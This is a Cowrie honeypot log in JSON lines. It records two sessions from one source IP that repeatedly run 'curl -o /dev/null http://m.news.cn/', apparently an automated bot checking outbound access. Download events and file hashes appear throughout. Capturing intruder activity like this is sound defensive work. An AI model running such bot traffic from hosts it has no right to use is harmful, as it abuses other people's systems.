{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.905476Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.907248Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.913496Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.932155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.933402Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.945452Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.947096Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.950717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.951571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.974443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.975717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.984830Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.986347Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:21.996132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:21.997113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.017423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.018640Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.021656Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.030423Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.031898Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.056878Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.058044Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.079294Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.080787Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.097380Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.100024Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.120786Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.121966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.138419Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.139511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.162367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.163582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.167915Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.170565Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.174909Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.175898Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.188446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.200644Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.201752Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.209638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.210619Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.228251Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.234435Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.236363Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.242917Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.243984Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.249742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.251450Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.279319Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.280856Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.290241Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.291267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.294298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.295188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.330062Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.332333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.333717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.336382Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.337399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.351612Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.384326Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.402101Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.423856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.424826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.426969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.428058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.429730Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.447548Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.467958Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.469114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.473939Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.475498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.476223Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.492418Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.507374Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.508487Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.516282Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.517279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.518757Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.541371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.543668Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.544717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.561480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.562537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.574520Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.580217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.581159Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.588650Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.606130Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.608119Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.609080Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.619065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.620073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.633055Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.652568Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.653661Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.659160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.660155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.661155Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.663238Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.704732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.706436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.707575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.710522Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.713048Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.713974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.748356Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.749683Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.763370Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.764574Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.767706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.769027Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.796754Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.818192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.819240Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:22.832924Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.835641Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.839471Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:22.841340Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
